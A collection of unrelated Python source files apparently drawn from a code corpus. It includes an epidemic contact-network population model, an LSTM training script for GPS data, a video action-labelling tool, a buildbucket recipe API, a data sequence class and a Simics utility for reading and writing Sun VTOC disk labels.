g = NetworkXWrappers.lfr_ba(gs, **kwargs)
mapping = {i: i+cur_size for i in range(gs)}
nx.relabel_nodes(g, mapping, copy=False)
for node in g:
g.nodes[node]["hier_comm"] = hier_com
comm = g.nodes[node]["community"]
relabeled_comm = set()
for val in list(comm):
relabeled_comm.add(val+cur_size)
combined.add_nodes_from(g.nodes(data=True))
combined.add_edges_from(g.edges)
cur_size += gs
for u in combined:
this_hcomm = combined.nodes[u]["hier_comm"]
adjs = combined[u]
for adj in list(adjs):
if (adj not in combined.nodes[u]["community"]
and random.uniform(0, 1) < kwargs["mu_hier"]/2):
while True:
randint = random.randint(0, pop_size-1)
v = combined.nodes[randint]
if randint == u:
continue
if randint in combined.nodes[u]["community"]:
continue
if v["hier_comm"] == this_hcomm:
continue
partner = None
for adj2 in list(combined[randint]):
if (adj2 not in v["community"] and
adj2 not in combined.nodes[u]["community"]):
partner = adj2
break
if partner is not None:
break
combined.remove_edge(u, adj)
combined.remove_edge(randint, partner)
combined.add_edge(u, randint)
combined.add_edge(adj, partner)
combined = NetworkXWrappers.add_lfr_weights(combined)
nx.set_node_attributes(
g, kwargs["school_symp_prob"], "symp_prob")
return combined
@staticmethod
def relaxed_caveman_graph(pop_size, **kwargs):
clique_size = kwargs["clique_size"]
n_cliques = pop_size // clique_size
p = kwargs["p"]
g = nx.relaxed_caveman_graph(n_cliques, clique_size, p)
g.remove_edges_from(nx.selfloop_edges(g))
if kwargs["pruning_frac"] > 0:
rem_edges = random.sample(
g.edges,
k=int(kwargs["pruning_frac"] * len(g.edges))
)
g.remove_edges_from(rem_edges)
return g
@staticmethod
def schools_model(pop_size, **kwargs):
rstate = config["runtime"]["random state"]
school_graph = NetworkXWrappers.relaxed_caveman_graph(
pop_size, **kwargs
)
nx.set_node_attributes(
school_graph, kwargs["school_symp_prob"], "symp_prob")
# add families
family_sizes = scipy.stats.nbinom.rvs(
8, 0.9, size=len(school_graph), random_state=rstate) + 1
cur_size = len(school_graph)
combined = nx.Graph()
combined.add_nodes_from(school_graph.nodes(data=True))
combined.add_edges_from(school_graph.edges)
for node, fam_size in zip(school_graph.nodes, family_sizes):
combined.nodes[node]["type"] = "school"
combined.nodes[node]["random_testable"] = True
combined.nodes[node]["family_index"] = node
f_graph = nx.generators.complete_graph(fam_size)
nx.set_node_attributes(
f_graph, kwargs["family_symp_prob"], "symp_prob")
mapping = {i: i+cur_size for i in range(fam_size)}
nx.relabel_nodes(f_graph, mapping, copy=False)
for v in f_graph.nodes:
f_graph.nodes[v]["type"] = "family"
f_graph.nodes[v]["family_index"] = node
f_graph.nodes[v]["random_testable"] = False
combined.add_nodes_from(f_graph.nodes(data=True))
for v in f_graph.nodes:
combined.add_edge(node, v)
combined.add_edges_from(f_graph.edges)
cur_size += fam_size
combined.graph["n_school"] = len(school_graph)
return combined
class NetworkXPopulation(Population):
def __init__(self, interaction_rate_scaling=1, *args, **kwargs):
super().__init__(
interaction_rate_scaling=interaction_rate_scaling, *args, **kwargs
)
self._random_interact_pdf = construct_pdf(
config["population"]["random interactions pdf"]
)
self._random_interact_intensity_pdf = construct_pdf(
config["population"]["random interactions intensity pdf"]
)
gen_func = getattr(
NetworkXWrappers, config["population"]["nx"]["func"]
)
self._graph = gen_func(
self._pop_size, **(config["population"]["nx"]["kwargs"])
)
for node in self._graph:
self._graph.nodes[node]["history"] = {}
def get_contacts(
self, rows: np.ndarray, cols: np.ndarray, return_rows=False
) -> Union[
Tuple[np.ndarray, np.ndarray],
Tuple[np.ndarray, np.ndarray, np.ndarray],
]:
contact_cols = []
contact_rows = []
n_rnd_contacts = np.asarray(
np.round(self._random_interact_pdf.rvs(rows.shape[0])),
dtype=np.int,
)
rnd_indices_all = np.split(
self._rstate.randint(
0, len(rows), size=np.sum(n_rnd_contacts), dtype=np.int
),
np.cumsum(n_rnd_contacts),
)[:-1]
rnd_ctc_intens_all = np.split(
self._random_interact_intensity_pdf.rvs(np.sum(n_rnd_contacts)),
np.cumsum(n_rnd_contacts),
)[:-1]
col_set = set(cols)
for row, n_rnd_contact, rnd_indices, rnd_ctc_intens in zip(
rows, n_rnd_contacts, rnd_indices_all, rnd_ctc_intens_all):
sel_cols = []
sel_rows = []
adj = self._graph[row]
for ctc_ind, node_attrs in adj.items():
if ctc_ind not in col_set:
continue
sel_cols.append(ctc_ind)
sel_rows.append(row)
for rnd_ind, intens in zip(rnd_indices, rnd_ctc_intens):
if rnd_ind not in col_set:
continue
if rnd_ind not in adj:
sel_cols.append(rnd_ind)
sel_rows.append(row)
contact_cols.append(np.array(sel_cols, dtype=int))
contact_rows.append(np.array(sel_rows, dtype=int))
if contact_cols:
contact_cols = np.concatenate(contact_cols)
contact_rows = np.concatenate(contact_rows)
unique_indices, ind, counts = np.unique(
contact_cols, return_index=True, return_counts=True
)
contact_cols = unique_indices
# contact_rates = contact_rates[ind] * counts
contact_rows = contact_rows[ind]
contact_strengths = np.ones_like(unique_indices) * counts
else:
contact_cols = np.empty(0, dtype=int)
contact_rows = np.empty(0, dtype=int)
contact_strengths = np.empty(0, dtype=int)
if return_rows:
return contact_cols, contact_strengths, contact_rows
else:
return contact_cols, contact_strengths
|
nilq/baby-python
|
python
|
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
from tensorflow.keras import Sequential
from tensorflow.keras.layers import Dense, LSTM, Dropout
from sklearn.preprocessing import MinMaxScaler
dataset = pd.read_csv('../Dataset/GPS Database Cleaned Data-One Day.csv', parse_dates=True, index_col='date_time')
# for set all decimal points to 4
dataset = np.array(dataset)
len = dataset.shape[0]
for row in range(len):
dataset[row, 8] = round(dataset[row, 8], 5)
dataset[row, 9] = round(dataset[row, 9], 5)
dataset[row, 10] = round(dataset[row, 10], 5)
# categorical data encoding
from sklearn.preprocessing import OneHotEncoder
from sklearn.compose import ColumnTransformer
transformer = ColumnTransformer(
transformers=[
("OneHotEncoder", # Just a name
OneHotEncoder(), # The transformer class
[0] # The column(s) to be applied on.
)
],
remainder='passthrough'
)
dataset = transformer.fit_transform(dataset)
# Avoiding Dummy Variable Trap
# dataset = dataset[:, 1:]
transformer = ColumnTransformer(
transformers=[
("OneHotEncoder", # Just a name
OneHotEncoder(), # The transformer class
[1] # The column(s) to be applied on.
)
],
remainder='passthrough'
)
dataset = transformer.fit_transform(dataset)
# Avoiding Dummy Variable Trap
# dataset = dataset[:, 1:]
transformer = ColumnTransformer(
transformers=[
("OneHotEncoder", # Just a name
OneHotEncoder(), # The transformer class
[2] # The column(s) to be applied on.
)
],
remainder='passthrough'
)
dataset = transformer.fit_transform(dataset)
dataset=dataset.astype('float32')
# Avoiding Dummy Variable Trap
# dataset = dataset[:, 1:]
# Feature Scaling
from sklearn.preprocessing import StandardScaler
#
scaler = MinMaxScaler(feature_range=(0, 2))
# scaler = StandardScaler()
# dataset = scaler.fit_transform(dataset)
# spliting the dataset into test data and training data
from sklearn.model_selection import train_test_split
training_set, test_set = train_test_split(dataset, test_size=0.1)
# Prepare Training Data
X_train, y_train = [], []
for i in range(6, training_set.shape[0] - 7):
X_train.append(training_set[i - 6:i])
y_train.append(training_set[i+1, 8])
X_train = np.array(X_train)
y_train = np.array(y_train)
# X_train = np.reshape(X_train.shape[0], X_train.shape[1], 1)
# y_train = np.reshape(y_train.shape[0], y_train.shape[1], 1)
# Build LSTM
regressor = Sequential()
regressor.add(LSTM(units=100, activation='relu', input_shape=(X_train.shape[1], 11), return_sequences=True))
regressor.add(Dropout(0.2))
regressor.add(LSTM(units=170, activation='relu', return_sequences=True))
regressor.add(Dropout(0.3))
regressor.add(LSTM(units=190, activation='relu', return_sequences=True))
regressor.add(Dropout(0.4))
regressor.add(LSTM(units=250, activation='relu'))
regressor.add(Dropout(0.5))
regressor.add(Dense(units=1))
regressor.compile(optimizer='adam', loss='mean_squared_error', metrics=['accuracy'])
regressor.fit(X_train, y_train, epochs=15, batch_size=10)
# prepare test set
training_set = pd.DataFrame(training_set)
test_set = pd.DataFrame(test_set)
# 6*10
past_60_seconds = training_set.tail(6)
test_set = past_60_seconds.append(test_set, ignore_index=True)
X_test, y_test = [], []
test_set = np.array(test_set)
for i in range(6, test_set.shape[0] - 6):
X_test.append(test_set[i - 6:i])
y_test.append(test_set[i, 8])
X_test = np.array(X_test)
y_test = np.array(y_test)
X_test_0 = X_train[0]
X_test_0 = np.array(X_test_0)
X_test_0 = X_test_0.reshape(1, 6, 11)
y_pred_0 = regressor.predict(X_test_0)
X_test_1 = X_train[1]
X_test_1 = np.array(X_test_1)
X_test_1 = X_test_1.reshape(1, 6, 11)
y_pred_1 = regressor.predict(X_test_1)
X_test_2 = X_train[2]
X_test_2 = np.array(X_test_2)
X_test_2 = X_test_2.reshape(1, 6, 11)
y_pred_2 = regressor.predict(X_test_2)
y_pred = regressor.predict(X_test)
|
nilq/baby-python
|
python
|
import torch.nn as nn
from MyPyTorchAPI.CustomActivation import *
class FCCov(torch.nn.Module):
def __init__(self, fc_input_size):
super().__init__()
self.fc = nn.Sequential(
nn.Linear(fc_input_size, 512),
nn.BatchNorm1d(512),
nn.PReLU(),
nn.Linear(512, 64),
nn.BatchNorm1d(64),
nn.PReLU(),
nn.Linear(64, 64),
nn.BatchNorm1d(64),
Sigmoid(a=0.1, max=1),
nn.Linear(64, 6))
def forward(self, x):
x = self.fc(x)
return x
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
import matplotlib.pyplot as plt
import os
import imageio
import numpy as np
import cv2
from tqdm import tqdm_notebook as tqdm
import scipy.misc
from generator import read_videofile_txt
import os
import shutil
from generator import build_label2str
from predict_and_save_kitty import extract_bbox_for_line
import cv2
def save_vid_with_labels(kitty_folder, video_path, frame_output_folder, label_csv, id_format_colon=False, verbose=True):
'''Saves a video frame by frame where a bounding box is drawn around the detected
persons and an action label is provided.
Needs a kitty folder where the kitty files have action labels.'''
vid = imageio.get_reader(video_path, 'ffmpeg')
total_frames=len(vid)
kitty_files = sorted(os.listdir(kitty_folder))
frame_idxs = [int(n.split('.')[0].split('_')[-1])-1 for n in kitty_files]
if verbose:
print('Video loaded, len frame_idxs:', len(frame_idxs), 'len vid:', len(vid))
# Get label to string dict
label2str_dict = build_label2str(label_csv)
label2str_dict[-1] = 'undefined'
print('label2str_dict',label2str_dict)
if not os.path.exists(frame_output_folder):
os.mkdir(frame_output_folder)
for num in tqdm(range(total_frames)):
# check for valid frame number
# if num >= 0 & num <= totalFrames:
# # set frame position
# cap.set(cv2.CAP_PROP_POS_FRAMES,myFrameNumber)
# ret, img = cap.read()
# print('ret:',ret)
img = vid.get_data(num)
if num in frame_idxs:
# Read txt file
txt_line_list = read_videofile_txt(os.path.join(kitty_folder,kitty_files[num]))
# print('txt_line_list:',txt_line_list)
# Get all bboxes for this frame
for j,line in enumerate(txt_line_list):
# Extract id
if id_format_colon:
id_ = int(float(line.split(' ')[0].split(':')[-1]))
else:
id_ = int(float(line.split(' ')[1]))
# Extract action label
act_label = int(float(line.split(' ')[-1]))
if act_label == -1:
font_size=0.5
font_color = (200,200,0)
bbox_color = (100,0,0)
else:
font_size=0.8
font_color = (255,255,0)
bbox_color = (255,0,0)
text_label = label2str_dict[act_label]
# print('text_label:', text_label)
# Getting bbox
crop, bbox = extract_bbox_for_line(line, img, idx_bbox=3, margin=0.0, show=False, debug=False, k=1.0)
left, right, top, bottom = bbox
cv2.rectangle(img, (left,top), (right,bottom), bbox_color, 2)
cv2.putText(img, text_label, (left, top), cv2.FONT_HERSHEY_SIMPLEX, font_size, font_color, lineType=cv2.LINE_AA)
# if not num%10:
# plt.figure()
# plt.imshow(img)
# plt.show()
imageio.imwrite(os.path.join(frame_output_folder, str(num)+'.jpg'), img)
if __name__ == "__main__":
save_vid_with_labels('../../../p2_metropolis/tmp/cfosco/VIDEOS/KITTI_CFOSCOnyc_c0110_2/with_action_labels',
'../../../p2_metropolis/tmp/cfosco/VIDEOS/nyc_c0110_2.mp4',
frame_output_folder = '../tmp_vid', label_csv='../../../nfs_share/datasets/IVA_Videos/crops_mixed_aux/labels_5.csv')
|
nilq/baby-python
|
python
|
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""API for interacting with the buildbucket service directly.
Instead of triggering jobs by emitting annotations then handled by the master,
this module allows slaves to directly post requests to buildbucket.
"""
import json
import os
import uuid
from recipe_engine import recipe_api
class BuildbucketApi(recipe_api.RecipeApi):
"""A module for interacting with buildbucket."""
def __init__(self, buildername, buildnumber, *args, **kwargs):
super(BuildbucketApi, self).__init__(*args, **kwargs)
self._buildername = buildername
self._buildnumber = buildnumber
self._properties = None
def get_config_defaults(self):
if self.m.platform.is_win:
return {'PLATFORM': 'win'}
return {'PLATFORM': 'default'}
def _configure_defaults(self):
"""Apply default configuration if no configuration has been set.
Ideally whoever uses this api will explicitly set the configuration by
doing `api.buildbucket.set_config('production_buildbucket')`, but to make
this module usable even in case they don't configure it, we set the default
to the production instance of buildbucket."""
# There's only two items in this module's configuration, the path to the
# buildbucket cli client binary and the buildbucket hostname, this default
# configuration will override them.
if not self.c or not self.c.complete():
self.set_config('production_buildbucket')
def _tags_for_build(self, bucket, parameters, override_tags=None):
buildbucket_info = self.properties or {}
original_tags_list = buildbucket_info.get('build', {}).get('tags', [])
original_tags = dict(t.split(':', 1) for t in original_tags_list)
new_tags = {'user_agent': 'recipe'}
if 'buildset' in original_tags:
new_tags['buildset'] = original_tags['buildset']
builder_name = parameters.get('builder_name')
if builder_name:
new_tags['builder'] = builder_name
if bucket.startswith('master.'):
new_tags['master'] = bucket[7:]
if self._buildnumber is not None:
new_tags['parent_buildnumber'] = str(self._buildnumber)
if self._buildername is not None:
new_tags['parent_buildername'] = str(self._buildername)
new_tags.update(override_tags or {})
return sorted([':'.join((x, y)) for x, y in new_tags.iteritems()])
@property
def properties(self):
"""Returns (dict-like or None): The BuildBucket properties, if present."""
if self._properties is None:
# Not cached, load and deserialize from properties.
props = self.m.properties.get('buildbucket')
if props is not None:
if isinstance(props, basestring):
props = json.loads(props)
self._properties = props
return self._properties
def put(self, builds, service_account=None, **kwargs):
"""Puts a batch of builds.
Args:
builds (list): A list of dicts, where keys are:
'bucket': (required) name of the bucket for the request.
'parameters' (dict): (required) arbitrary json-able parameters that a
build system would be able to interpret.
'tags': (optional) a dict(str->str) of tags for the build. These will
be added to those generated by this method and override them if
appropriate.
'client_operation_id': (optional) an arbitary string, ideally random,
used to prevent duplication of requests upon retry.
service_account (str): (optional) path to locally saved secrets for
service account to authenticate as.
Returns:
A step that as its .stdout property contains the response object as
returned by buildbucket.
"""
build_specs = []
for build in builds:
client_operation_id = build.get('client_operation_id', uuid.uuid4().hex)
build_specs.append(json.dumps({
'bucket': build['bucket'],
'parameters_json': json.dumps(build['parameters'], sort_keys=True),
'client_operation_id': client_operation_id,
'tags': self._tags_for_build(build['bucket'],
build['parameters'],
build.get('tags'))
}, sort_keys=True))
return self._call_service('put', build_specs, service_account, **kwargs)
def cancel_build(self, build_id, service_account=None, **kwargs):
return self._call_service('cancel', [build_id], service_account, **kwargs)
def get_build(self, build_id, service_account=None, **kwargs):
return self._call_service('get', [build_id], service_account, **kwargs)
def _call_service(self, command, args, service_account=None, **kwargs):
# TODO: Deploy buildbucket client using cipd.
self._configure_defaults()
step_name = kwargs.pop('name', 'buildbucket.' + command)
if service_account:
args = ['--service-account-json', service_account] + args
args = [str(self.c.buildbucket_client_path), command, '--host',
self.c.buildbucket_host] + args
return self.m.step(
step_name, args, stdout=self.m.json.output(), **kwargs)
|
nilq/baby-python
|
python
|
from parsers import golden_horse_parser
parser = golden_horse_parser()
args = parser.parse_args()
REDUNDANT_INFO_LINE_NUM = 4
TRAILING_USELESS_INFO_LINE_NUM = -1
def clean_line(string, remove_trainling_position=-2):
return string.replace('\t', '').split(',')[:remove_trainling_position]
def main():
with open(args.input, encoding=args.encoding) as file_handle:
lines = file_handle.readlines()[
REDUNDANT_INFO_LINE_NUM:TRAILING_USELESS_INFO_LINE_NUM
]
cleaned_lines = [
clean_line(line) for line in lines
]
with open(args.output, 'w') as file_handle:
for line in cleaned_lines:
file_handle.write(f'{",".join(line)}\n')
if __name__ == '__main__':
main()
|
nilq/baby-python
|
python
|
from setuptools import setup
setup(name='money',
version='0.1',
description='Implementation of Fowler\s Money',
url='https://github.com/luka-mladenovic/fowlers-money',
author='Luka Mladenovic',
author_email='',
license='MIT',
packages=['money'],
install_requires=[
'pyyaml',
],
zip_safe=False)
|
nilq/baby-python
|
python
|
from . import sequence
from . import sampler as sampler_trw
import numpy as np
import collections
import copy
from ..utils import get_batch_n, len_batch
# this the name used for the sample UID
sample_uid_name = 'sample_uid'
class SequenceArray(sequence.Sequence):
"""
Create a sequence of batches from numpy arrays, lists and :class:`torch.Tensor`
"""
def __init__(
self,
split,
sampler=sampler_trw.SamplerRandom(),
transforms=None,
use_advanced_indexing=True,
sample_uid_name=sample_uid_name):
"""
Args:
split: a dictionary of tensors. Tensors may be `numpy.ndarray`, `torch.Tensor`, numeric
sampler: the sampler to be used to iterate through the sequence
transforms: a transform or list of transforms to be applied on each batch of data
use_advanced_indexing:
sample_uid_name: if not `None`, create a unique UID per sample so that it is easy to track
particular samples (e.g., during data augmentation)
"""
super().__init__(None) # there is no source sequence for this as we get our input from a numpy split
self.split = split
self.nb_samples = None
self.sampler = sampler
self.sampler_iterator = None
self.transforms = transforms
self.use_advanced_indexing = use_advanced_indexing
# create a unique UID
if sample_uid_name is not None and sample_uid_name not in split:
split[sample_uid_name] = np.asarray(np.arange(len_batch(split)))
def subsample(self, nb_samples):
# get random indices
subsample_sample = sampler_trw.SamplerRandom(batch_size=nb_samples)
subsample_sample.initializer(self.split)
# extract the indices
indices = next(iter(subsample_sample))
subsampled_split = get_batch_n(
self.split,
len_batch(self.split),
indices,
self.transforms,
# use `use_advanced_indexing` so that we keep the types as close as possible to original
use_advanced_indexing=True
)
return SequenceArray(
subsampled_split,
copy.deepcopy(self.sampler),
transforms=self.transforms,
use_advanced_indexing=self.use_advanced_indexing
)
def subsample_uids(self, uids, uids_name, new_sampler=None):
uid_values = self.split.get(uids_name)
assert uid_values is not None, 'no UIDs with name={}'.format(uids_name)
# find the samples that are in `uids`
indices_to_keep = []
uids_set = set(uids)
for index, uid in enumerate(uid_values):
if uid in uids_set:
indices_to_keep.append(index)
# reorder the `indices_to_keep` following the `uids` ordering
uids_ordering = {uid: index for index, uid in enumerate(uids)}
kvp_index_ordering = []
for index in indices_to_keep:
uid = uid_values[index]
ordering = uids_ordering[uid]
kvp_index_ordering.append((index, ordering))
kvp_uids_ordering = sorted(kvp_index_ordering, key=lambda value: value[1])
indices_to_keep = [index for index, ordering in kvp_uids_ordering]
# extract the samples
subsampled_split = get_batch_n(
self.split,
len_batch(self.split),
indices_to_keep,
self.transforms,
# use `use_advanced_indexing` so that we keep the types as close as possible to original
use_advanced_indexing=True
)
if new_sampler is None:
new_sampler = copy.deepcopy(self.sampler)
else:
new_sampler = copy.deepcopy(new_sampler)
return SequenceArray(
subsampled_split,
new_sampler,
transforms=self.transforms,
use_advanced_indexing=self.use_advanced_indexing
)
def __iter__(self):
# make sure the sampler is copied so that we can have multiple iterators of the
# same sequence
return SequenceIteratorArray(self, copy.deepcopy(self.sampler))
def close(self):
pass
class SequenceIteratorArray(sequence.SequenceIterator):
"""
Iterate the elements of an :class:`trw.train.SequenceArray` sequence
Assumptions:
- underlying `base_sequence` doesn't change sizes while iterating
"""
def __init__(self, base_sequence, sampler):
super().__init__()
self.base_sequence = base_sequence
self.nb_samples = len_batch(self.base_sequence.split)
self.sampler = sampler
self.sampler.initializer(self.base_sequence.split)
self.sampler_iterator = iter(self.sampler)
def __next__(self):
indices = self.sampler_iterator.__next__()
if not isinstance(indices, (np.ndarray, collections.Sequence)):
indices = [indices]
return get_batch_n(
self.base_sequence.split,
self.nb_samples,
indices,
self.base_sequence.transforms,
self.base_sequence.use_advanced_indexing)
def close(self):
pass
|
nilq/baby-python
|
python
|
from cli import *
#
# VTOC layout: (with unimportant fields removed)
#
# OFFSET SIZE NUM NAME
# 0 128 1 label
VTOC_VERSION = 128 # 128 4 1 version
# 132 8 1 volume name
VTOC_NUMPART = 140 # 140 2 1 number of partitions
VTOC_PART_S2 = 142 # 142 4 8 partition headers, section 2
# 2 bytes tag
# 2 bytes permission flag
# 174 2 1 <pad>
# 176 4 3 bootinfo
VTOC_SANITY = 188 # 188 4 1 sanity
# 192 4 10 <reserved>
# 232 4 8 partition timestamp
# 264 2 1 write reinstruct
# 266 2 1 read reinstruct
# 268 152 1 <pad>
VTOC_RPM = 420 # 420 2 1 rpm
VTOC_PHYS_CYL = 422 # 422 2 1 physical cylinders
VTOC_ALT_P_CYL = 424 # 424 2 1 alternates per cylinder
# 426 2 1 <obsolete>
# 428 2 1 <obsolete>
VTOC_INTRLV = 430 # 430 2 1 interleave
VTOC_DATA_CYL = 432 # 432 2 1 data cylinders
VTOC_ALT_CYL = 434 # 434 2 1 alt cylinders
VTOC_HEADS = 436 # 436 2 1 heads
VTOC_TRACKS = 438 # 438 2 1 sectors per track
# 440 2 1 <obsolete>
# 442 2 1 <obsolete>
VTOC_PART_S1 = 444 # 444 8 8 partition headers, section 1
# 4 bytes start cylinder
# 4 bytes number of blocks
VTOC_MAGIC = 508 # 508 2 1 magic = 0xDABE
VTOC_CHECKSUM = 510 # 510 2 1 checksum
tag_list = { 0 : "unused",
1 : "boot",
2 : "root",
3 : "swap",
4 : "usr",
5 : "backup",
7 : "var",
8 : "home",
130 : "Linux swap",
131 : "Linux" }
flag_list = { 0 : "RW",
1 : "unmountable",
2 : "RO" }
def get_tag_str(tag):
try:
return "(" + tag_list[tag] + ")"
except:
return "(unknown)"
def get_flag_str(flag):
try:
return "(" + flag_list[flag] + ")"
except:
return "(unknown)"
def calculate_checksum(vtoc):
chk = 0
for i in range(0, 510, 2):
chk ^= get_vtoc_int16(vtoc, i)
return chk
def get_vtoc_label(vtoc):
str = ""
for i in vtoc:
if i == 0:
return str
str += chr(i)
def set_vtoc_label(vtoc, str):
for i in range(0, len(str)):
vtoc[i] = ord(str[i])
for j in range(i + 1, 512):
vtoc[j] = 0
def get_vtoc_int16(vtoc, offset):
return (vtoc[offset] << 8) | vtoc[offset + 1]
def set_vtoc_int16(vtoc, offset, value):
vtoc[offset] = (value >> 8) & 0xff
vtoc[offset + 1] = value & 0xff
def get_vtoc_int32(vtoc, offset):
return (get_vtoc_int16(vtoc, offset) << 16) | get_vtoc_int16(vtoc, offset + 2)
def set_vtoc_int32(vtoc, offset, value):
set_vtoc_int16(vtoc, offset, (value >> 16) & 0xffff)
set_vtoc_int16(vtoc, offset + 2, value & 0xffff)
def read_block(obj, offset):
if obj.classname == "scsi-disk":
return list(obj.sector_data[offset * 512])
elif obj.classname == "ide-disk":
block = []
for i in range(0, 512):
block.append(obj.image.byte_access[offset * 512 + i])
return block
else:
raise Exception, "Unknown disk type"
def write_block(obj, offset, block):
if obj.classname == "scsi-disk":
obj.sector_data[offset * 512] = block
elif obj.classname == "ide-disk":
for i in range(0, 512):
obj.image.byte_access[offset * 512 + i] = block[i]
else:
raise Exception, "Unknown disk type"
def print_partitions(obj, vtoc):
heads = get_vtoc_int16(vtoc, VTOC_HEADS)
s_per_t = get_vtoc_int16(vtoc, VTOC_TRACKS)
print "Partition Table:"
print "Number Tag Flag Start End Size"
for i in range(0, 8):
tag = get_vtoc_int16(vtoc, VTOC_PART_S2 + 4 * i + 0)
flag = get_vtoc_int16(vtoc, VTOC_PART_S2 + 4 * i + 2)
start = get_vtoc_int32(vtoc, VTOC_PART_S1 + 8 * i + 0)
blocks = get_vtoc_int32(vtoc, VTOC_PART_S1 + 8 * i + 4)
if blocks == 0:
continue
start *= heads * s_per_t
print " %d %d %-12s %d %-13s %9d %9d %9d" % (
i, tag, get_tag_str(tag), flag, get_flag_str(flag),
start, start + blocks - 1, blocks)
def print_sun_vtoc_cmd(obj):
vtoc = read_block(obj, 0)
if get_vtoc_int16(vtoc, VTOC_MAGIC) != 0xDABE:
print "This does not appear to be a Sun Disk."
print "The magic is %x, expected 0xDABE" % get_vtoc_int16(vtoc, VTOC_MAGIC)
print
return
data_cyl = get_vtoc_int16(vtoc, VTOC_DATA_CYL)
phys_cyl = get_vtoc_int16(vtoc, VTOC_PHYS_CYL)
heads = get_vtoc_int16(vtoc, VTOC_HEADS)
s_per_t = get_vtoc_int16(vtoc, VTOC_TRACKS)
print
print " Label : %s" % get_vtoc_label(vtoc)
print " RPM : %s" % get_vtoc_int16(vtoc, VTOC_RPM)
print " Data cylinders : %d" % data_cyl
print " Alt cylinders : %d" % get_vtoc_int16(vtoc, VTOC_ALT_CYL)
print "Physical cylinders : %d" % phys_cyl
print " Heads : %d" % heads
print " Sectors per Track : %d" % s_per_t
print
print " Number of data blocks : %d" % (data_cyl * s_per_t * heads)
print
print_partitions(obj, vtoc)
num_part = get_vtoc_int16(vtoc, VTOC_NUMPART)
chk_sum = get_vtoc_int16(vtoc, VTOC_CHECKSUM)
if num_part != 8:
print
print "### Illegal number of partitions set (%d), only 8 supported" % num_part
if calculate_checksum(vtoc) != chk_sum:
print "### Incorrect checksum: %d. Expected: %d" % (chk_sum, calculate_checksum(vtoc))
print
def write_sun_vtoc_cmd(obj, C, H, S, quiet):
vtoc = [0] * 512
if -1 in [C, H, S] and [C, H, S] != [-1, -1, -1]:
print "Only Partial geometry specified."
SIM_command_has_problem()
return
alt = 2
if [C, H, S] != [-1, -1, -1]:
cyl = C - alt
heads = H
s_per_t = S
elif obj.classname == "scsi-disk":
print "No geometry specified for SCSI disk VTOC."
SIM_command_has_problem()
return
elif obj.classname == "ide-disk":
cyl = obj.disk_cylinders - alt
heads = obj.disk_heads
s_per_t = obj.disk_sectors_per_track
pass
else:
raise Exception, "Unknown disk type"
set_vtoc_label(vtoc, "SIMDISK cyl %d alt %d hd %d sec %d" % (cyl, alt, heads, s_per_t))
set_vtoc_int32(vtoc, VTOC_VERSION, 1)
set_vtoc_int16(vtoc, VTOC_MAGIC, 0xDABE)
set_vtoc_int16(vtoc, VTOC_DATA_CYL, cyl)
set_vtoc_int16(vtoc, VTOC_ALT_CYL, alt)
set_vtoc_int16(vtoc, VTOC_INTRLV, 1)
set_vtoc_int16(vtoc, VTOC_PHYS_CYL, cyl + alt)
set_vtoc_int16(vtoc, VTOC_HEADS, heads)
set_vtoc_int16(vtoc, VTOC_TRACKS, s_per_t)
set_vtoc_int16(vtoc, VTOC_NUMPART, 8)
set_vtoc_int16(vtoc, VTOC_RPM, 7200)
set_vtoc_int32(vtoc, VTOC_SANITY, 0x600ddeee)
# set checksum last!
set_vtoc_int16(vtoc, VTOC_CHECKSUM, calculate_checksum(vtoc))
write_block(obj, 0, tuple(vtoc))
# create the backup slice
write_sun_vtoc_partition_cmd(obj, 2, "backup", "unmountable", 0, cyl * heads * s_per_t, 1)
if not quiet and SIM_get_quiet() == 0:
print "New VTOC written to disk:"
print_sun_vtoc_cmd(obj)
def write_sun_vtoc_partition_cmd(obj, nbr, tag_str, flag_str, start, blocks, quiet):
if nbr < 0 or nbr > 7:
print "Partitions are numbered 0 ..7\n"
return
try:
tag = tag_list.keys()[tag_list.values().index(tag_str)]
except:
print "Unknown tag type '%s'" % tag_str
print "Try one of:"
for i in tag_list.values():
print " " + i
print
return
try:
flag = flag_list.keys()[flag_list.values().index(flag_str)]
except:
print "Unknown flag '%s'" % flag_str
print "Try one of:"
for i in flag_list.values():
print " " + i
print
return
vtoc = read_block(obj, 0)
heads = get_vtoc_int16(vtoc, VTOC_HEADS)
s_per_t = get_vtoc_int16(vtoc, VTOC_TRACKS)
set_vtoc_int16(vtoc, VTOC_PART_S2 + 4 * nbr + 0, tag)
set_vtoc_int16(vtoc, VTOC_PART_S2 + 4 * nbr + 2, flag)
set_vtoc_int32(vtoc, VTOC_PART_S1 + 8 * nbr + 0, start / (heads * s_per_t))
set_vtoc_int32(vtoc, VTOC_PART_S1 + 8 * nbr + 4, blocks)
# set checksum last!
set_vtoc_int16(vtoc, VTOC_CHECKSUM, calculate_checksum(vtoc))
write_block(obj, 0, tuple(vtoc))
if not quiet and SIM_get_quiet() == 0:
print_partitions(obj, vtoc)
print
def delete_sun_vtoc_partition_cmd(obj, nbr, quiet):
if nbr < 0 or nbr > 7:
print "Partitions are numbered 0 ..7\n"
return
vtoc = read_block(obj, 0)
set_vtoc_int16(vtoc, VTOC_PART_S2 + 4 * nbr + 0, 0)
set_vtoc_int32(vtoc, VTOC_PART_S1 + 8 * nbr + 4, 0)
# set checksum last!
set_vtoc_int16(vtoc, VTOC_CHECKSUM, calculate_checksum(vtoc))
write_block(obj, 0, tuple(vtoc))
if not quiet and SIM_get_quiet() == 0:
print_partitions(obj, vtoc)
print
def dump_sun_partition_cmd(obj, nbr, file):
if nbr < 0 or nbr > 7:
print "Partitions are numbered 0 ..7\n"
return
vtoc = read_block(obj, 0)
heads = get_vtoc_int16(vtoc, VTOC_HEADS)
s_per_t = get_vtoc_int16(vtoc, VTOC_TRACKS)
start = get_vtoc_int32(vtoc, VTOC_PART_S1 + 8 * nbr) * heads * s_per_t
blocks = get_vtoc_int32(vtoc, VTOC_PART_S1 + 8 * nbr + 4)
if blocks == 0:
print "No partition %d.\n" % nbr
return
print "Dumping partition %d. Start block %d. Size in blocks: %d" % (nbr, start, blocks)
# index with list, since python doesn't have 4 bit indexes
try:
obj.image.dump[[file, start * 512, blocks * 512]]
except Exception, msg:
print "Failed getting a dump from the disk image."
print "Error message was: %s\n" % msg
return
print "Partition dumped successfully.\n"
def add_sun_partition_cmd(obj, nbr, file):
if nbr < 0 or nbr > 7:
print "Partitions are numbered 0 ..7\n"
return
vtoc = read_block(obj, 0)
